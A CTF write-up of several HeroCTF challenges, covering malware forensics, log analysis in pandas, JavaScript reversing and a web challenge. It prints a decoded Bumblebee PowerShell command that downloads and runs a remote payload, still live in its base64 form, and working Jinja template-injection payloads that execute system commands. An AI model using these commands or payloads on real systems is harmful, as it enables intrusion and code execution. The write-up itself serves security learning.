1. Summary

2. CTF and Organizer

HeroCTF is an annual cybersecurity online competition featuring a wide variety of challenges. Top teams are awarded prizes.

3. Challenges

Forensics

1. Transformers 1/2

• Open the attached ISO file in a sandbox:

  

• The file is Document.lnk.

Resources:

• Open ISO file online: https://www.ezyzip.com/open-iso-file-online.html
• View file online: https://filext.com/online-file-viewer.html
• Get file checksum: https://emn178.github.io/online-tools/sha256_checksum.html

2. Transformers 2/2

• Let’s check the .bat file found previously.
• After a few substitutions, we get:
  text

  XcMbRDHBpZdpUWwWVAyjhI
  
  powershell  -w hidden -nop -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBlAGUAcgBvAG4AaQB4AHQALgBjAG8AbQAvAGcAYQB0AGUAIgApAA==
  
  ECpzuBoV

• The first and last line seem useless but the Base64 string decodes to:
  text

  IEX (New-Object Net.Webclient).downloadstring("http[:]//meeronixt[.]com/gate")

• Now, let’s find the malware dropper. Dorking gives this result: https[:]//www.bleepingcomputer[.]com/forums/t/796962/please-my-pc-clean/
• Didn’t find a name on VirusTotal but found this analyst’s GitHub repository: https://github.com/pr0xylife/Bumblebee/blob/main/Bumblebee_19.09.2022.txt
• The malware dropper is Bumblebee.

3. LazySysAdmin 2/2

First part of LazySysAdmin was solved by a team mate! ❤️

• Download and mount the ISO file:
  shell

  $ sudo mkdir /mnt/iso
  $ sudo mount -o loop  ~/Downloads/server-SX03.iso /mnt/iso

• Login as root user and explore the image.
• There are tons of directories. /var/log/syslog and /home/server/.bash_history didn’t show anything interesting. Then, I stopped searching and asked myself what would I do if I was a lazy script kiddie? I would put my script in /tmp!
  shell

  # ls -la tmp
  drwxr-xr-t 17 root root 4096 oct.  27 10:43 .
  drwxr-xr-x 25 root root 4096 oct.  27 10:43 ..
  drwxr-xr-t  2 root root 2048 oct.  27 10:43 .font-unix
  drwxr-xr-t  2 root root 2048 oct.  27 10:43 .ICE-unix
  -rwxr-xr-x  1 root root  201 oct.  27 10:43 .script.sh
  ...
  -rwxr-xr-x  1 root root  139 oct.  27 10:43 .wrapper_script.sh
  -r--r--r--  1 root root   11 oct.  27 10:43 .X0-lock
  -r--r--r--  1 root root   11 oct.  27 10:43 .X1024-lock
  -r--r--r--  1 root root   11 oct.  27 10:43 .X1025-lock
  drwxr-xr-t  2 root root 2048 oct.  27 10:43 .X11-unix
  -r--r--r--  1 root root   11 oct.  27 10:43 .X1-lock
  drwxr-xr-t  2 root root 2048 oct.  27 10:43 .XIM-unix

  Lazyness is always the key.
• Let’s check the wrapper script:
  .wrapper_script.sh

  #!/bin/bash
  
  while true; do
  # Your main script code here
  /tmp/.script.sh
  
  # Wait for 15 seconds before running again
  sleep 15
  done

• The second script contains a PasteBin URL:
  .script.sh

  #!/bin/bash
  
  RANDOM_NUMBER=$(shuf -i 1-13 -n 1)
  
  INSUTLS=$(curl -s https[:]//pastebin[.]com/raw/59mL2V9i)
  temp=$(echo "$INSUTLS" | sed -n "${RANDOM_NUMBER}p" )
  
  tempp= echo "$temp" | base64 -id

• The pastebin content is:
  text

  WW91IHN1Y2sgIQ==
  RnVja2luZyBpZGlvdCA=
  WW91IHN1Y2sgIQ==
  U2VyaW91c2x5LCBXaG8gdGhlIGZ1Y2sgaXMgVm96ZWs/
  WW91IHN1Y2sgIQ==
  WW91IHN1Y2sgIQ==
  WW91IHN1Y2sgIQ==
  WFhYX0Q0cmtfcm9ndWUgaXMgdGhlIGJlc3QgISA=
  SEVST3tBbHdhWXMtQ2gzY2tfV2hhdF91LUMwUHktUDRzdGV9
  WW91IHN1Y2sgIQ==
  RGlkIHlvdSByZWFsbHkgYmVsaWV2ZSBpdCB3YXMgcG9zc2libGUgdG8gZG93bmxvYWQgUkFNLCB5b3UgZHVtYmFzcyB4RA==
  WW91IHN1Y2sgIQ==
  WW91IHN1Y2sgIQ==

• Which decoded from Base64 gives this nice message:
  text

  You suck !Fucking idiot You suck !Seriously, Who the fuck is Vozek?You suck !You suck !You suck !XXX_D4rk_rogue is the best ! HERO{AlwaYs-Ch3ck_What_u-C0Py-P4ste}You suck !Did you really believe it was possible to download RAM, you dumbass xDYou suck !You suck !

4. Tenant trouble

A CSV is attached to the challenge. For data exploration, Jupyter Notebook and Pandas are our best friends.

import pandas as pd

df = pd.read_csv("data/winchester77_signin_logs_2024.csv")
df.shape

df.head(5)

# Unique user IDs
len(df["UserId"].unique())

# Unique IP addresses
len(df["ClientIP"].unique())

# IP addresses occurences
df["ClientIP"].value_counts()

# Unique request IDs
#len(df["RequestId"].unique())
# Unique correlation IDs
#len(df["CorrelationId"].unique())
# Too much IPs, request and correlation IDs. Can't work with that.

df["Operation"].value_counts()

# UserLoginIn occurred only once, this is suspicious.
df[df["Operation"] == "UserLoginIn"]

# Sort by creation time
df["CreationTime"] = pd.to_datetime(df["CreationTime"])
df = df.sort_values(by="CreationTime")
df.to_csv("data/ordered.csv", index=False)

# Create a new dataframe where there is a row per user
user_ids = pd.Series(df["UserId"].tolist()).unique()
result_df = pd.DataFrame(user_ids, columns=["UserId"])

result_df["failed_logins"] = 0
result_df["ip_count"] = 0
failed_logins_df = df[df["Operation"] == "UserLoginFailed"]

# For each user
for user_id in result_df["UserId"]:
    # Add a column with IP count
    ips = pd.Series(df[df["UserId"] == user_id]["ClientIP"])
    result_df.loc[result_df["UserId"] == user_id, "ip_count"] = len(ips)
    
    # Add a column with failed logins count
    failed_logins = pd.Series(failed_logins_df[failed_logins_df["UserId"] == user_id]["Operation"])
    result_df.loc[result_df["UserId"] == user_id, "failed_logins"] = len(failed_logins)

result_df.sort_values(by=["failed_logins"], ascending=False)

is_mister_bennet = df["UserId"] == "mister.bennet@winchester77.onmicrosoft.com"
has_failed_login = df["Operation"] == "UserLoginFailed"
df[is_mister_bennet & has_failed_login]

Programming

1. Data Science

Jupyter Notebook and Pandas to the rescue again!

import pandas as pd
import numpy as np

df = pd.read_csv("data/orders.csv")
df.shape

# Count unique IDs
unique_person_ids = pd.Series(df["buyer_id"].tolist() + df["seller_id"].tolist()).unique()
len(unique_person_ids)

# Keep only orders before 2023-01-01
df["date"] = pd.to_datetime(df["date"])
df = df.sort_values(by="date")
df = df[df["date"] < "2023-01-01"]

# Add a new column with discount price
# We assume the discount is a % to apply on price
df["discount_price"] = df["price"] * (1 - df["discount"] / 100)

# Add a new column of money saved thanks to the discount
df["saved"] = df["price"] - df["discount_price"]

# Total money saved
df["saved"].sum()
np.floor(df["saved"].sum())

# Create a new dataframe where there is a row per person
result_df = pd.DataFrame(unique_person_ids, columns=["person_id"])
result_df["total_earned"] = 0.0  # at the beginning every person has 10000$
result_df["total_lost"] = 0.0

# For each person
for person_id in result_df["person_id"]:
    # Add a column with total money they earned as seller
    earned = 10000 + df[df["seller_id"] == person_id]["discount_price"].sum()
    result_df.loc[result_df["person_id"] == person_id, "total_earned"] = earned

    # Add a column with total money they lost as buyer
    lost = df[df["buyer_id"] == person_id]["discount_price"].sum()
    result_df.loc[result_df["person_id"] == person_id, "total_lost"] = lost

# Add a column holding balance (total money earned - money lost)
result_df["balance"] = result_df["total_earned"] - result_df["total_lost"]

# Show dataframe with highest balance first
result_df.sort_values(by=["balance"], ascending=False)

# Count persons with negative balance
negative_balance_count = (result_df["balance"] < 0).sum()
negative_balance_count

❤️ Huge thanks to my friend who found the error in my notebook. I used round() instead of floor() (Prices should be floored to the nearest integer, but only at the final stage of the calculation.).

Reverse

1. AutoInfector 1/3

• The linked website offers a simple button to download the malware. A password is required.
• There are two JavaScript files: md5.js and script.js which is obfuscated. Let’s assume the flag is in this file.
• de4js is very helpful to clean the JavaScript code at the beginning. Then, I modify the variable names and code manually. This results in the following code:
  javascript

  function xorStrHex(s1, s2) {
      var result = ''
      for (var i = 0; i < s1.length; i++) {
          result += (
          parseInt(s1[i], 16) ^ parseInt(s2[i], 16)
          ).toString(16)
      }
      return result
  }
  
  document.getElementById('download-malware').onclick = function () {
      const title = document.title.split(' - ')[0];  // AutoInfector
      const md5Title = hex_md5(title);
      const input = prompt('Enter the password to download the malware:');
  
      if (!input) {
          return
      }
      const md5Input = hex_md5(input);
      const xorStr = xorStrHex(md5Title, md5Input);
  
      if (xorStr === '11dfc83092be6f72c7e9e000e1de2960') {
          alert('You can validate the challenge with the following flag: Hero{' + input + '}');
          window.location.href = '/' + input + '.exe';
      } else {
          alert('Wrong password!');
      }
  }

• Knowing the following about XOR:

  a XOR b = c
  a XOR c = b
  b XOR c = a

• Then, the problem to solve is:

  input XOR md5Tile = 11dfc83092be6f72c7e9e000e1de2960

• First, we get md5Title value thanks to the browser console:
  javascript

  hex_md5("AutoInfector")

• So now we have:

  input XOR e3df2713dfaefd4badf9b892ba54245f = 11dfc83092be6f72c7e9e000e1de2960

• We should then do:

  e3df2713dfaefd4badf9b892ba54245f XOR 11dfc83092be6f72c7e9e000e1de2960 = input

• So let’s use the console again:
  js

  xorStrHex('e3df2713dfaefd4badf9b892ba54245f', '11dfc83092be6f72c7e9e000e1de2960')

• f200ef234d1092396a1058925b8a0d3f decodes to infectedmushroom.

Resources:

• https://md5decrypt.net/

Web

1. Jinjatic

• One of my team mates found the template injection (test+{{7*7}}@domain.tld). Then, we struggled to find a way to bypass Pydantic sanitizing.
• In the end, I found a working payload by testing characters input and discovering another email format could work (< and > were accepted): "John Smith" <john.smith@example.org>
  python

  "{{cycler.__init__.__globals__.os.system('/getflag > /tmp/lol.txt')}}" <a@a.n>
  "{{a.__init__.__globals__.__builtins__.open('/tmp/lol.txt','r').read()}}" <a@a.n>

Pwn

1. BankRupst

I don’t have any notes about this challenge but I remember reading the code and understanding we had to execute the commands in a special order to get the flag because of an allocation/logic issue.

4. Conclusion

The HeroCTF is one of my favorite CTFs. Challenge are diverse and interesting, in every category.

❤️ Thanks to my friends and team mates. And we were a women-only team!